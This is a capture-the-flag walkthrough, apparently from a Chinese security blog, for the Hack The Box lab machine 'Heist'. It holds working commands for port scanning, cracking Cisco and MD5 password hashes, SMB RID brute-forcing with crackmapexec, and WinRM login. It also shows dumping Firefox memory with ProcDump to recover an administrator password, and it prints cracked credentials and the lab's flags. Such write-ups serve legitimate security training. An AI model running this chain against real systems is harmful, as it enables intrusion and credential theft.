Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.149 | TCP:80,135,445,5985,49669 |
$ ip='10.10.10.149'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Cisco Password Crack && RID brute
http://10.10.10.149/login.php
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图](https://img.4awl.net/img/d8/983c3e62e499826135bdcc673336f9.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图")
http://10.10.10.149/issues.php
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图1](https://img.4awl.net/img/98/3352b26dad289bcec389007b40b796.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图1")
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图2](https://img.4awl.net/img/1a/86aa1237f68aa1bc2feb6d6169f78a.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图2")
https://www.ifm.net.nz/cookbooks/passwordcracker.html
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图3](https://img.4awl.net/img/74/d1ee041dfebc6f4def394dd73d144a.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图3")
username:rout3rpassword:$uperP@ssword
username:adminpassword:Q4)sJu\Y8qz*A3?d
$ john hash --wordlist=/home/maptnh/Desktop/rockyou.txt --fork=4
username:hazardpassword:stealth1agent
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图4](https://img.4awl.net/img/17/f953e4f7af1df1cc4795afdfa3fe36.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图4")
$ crackmapexec smb 10.10.10.149 -u user -p pass
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图5](https://img.4awl.net/img/f2/edc4ee9ba23a50adf7d9b55da6c7d0.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图5")
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图6](https://img.4awl.net/img/d7/f008b7fa30874c98e84f7767055570.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图6")
$ crackmapexec smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --rid-brute
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图7](https://img.4awl.net/img/54/755eb8052b48278a40b6ebcffa95d1.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图7")
$ crackmapexec smb 10.10.10.149 -u user -p pass
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图8](https://img.4awl.net/img/fa/0c503d22c0ca4a24df229d5984b9e0.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图8")
username:Chasepassword:Q4)sJu\Y8qz*A3?d
$ evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图9](https://img.4awl.net/img/1e/fa58c36322868cac5b5ad1aeca5f46.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图9")
User.txt
36b51bb5b3adc73e993df616c34e0ca8
Privilege Escalation:ProcDump
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图10](https://img.4awl.net/img/1a/e3429814dbafcd0708802f2a2a336b.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图10")
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
*Evil-WinRM* PS C:\Users\Chase\Desktop> upload ../home/maptnh/Desktop/htb/procdump64.exe ./
*Evil-WinRM* PS C:\Users\Chase\Desktop> Get-Process -Name firefox | Select-Object Id, ProcessName
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图11](https://img.4awl.net/img/d7/1b137947da251281e073197b0bc104.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图11")
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump64.exe -ma 6220 C:\Users\Chase\Desktop\res.dmp
*Evil-WinRM* PS C:\Users\Chase\Desktop> download res.dmp /tmp/res.dmp
$ strings res.dmp|grep login_password
password:4dD!5}x/re8]FBuZ
![[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图12](https://img.4awl.net/img/23/a7337f8a084106f4f7b84279953c2b.jpg "[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升插图12")
Root.txt
f2c7b7a831c8a87f285e1893307cd644
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
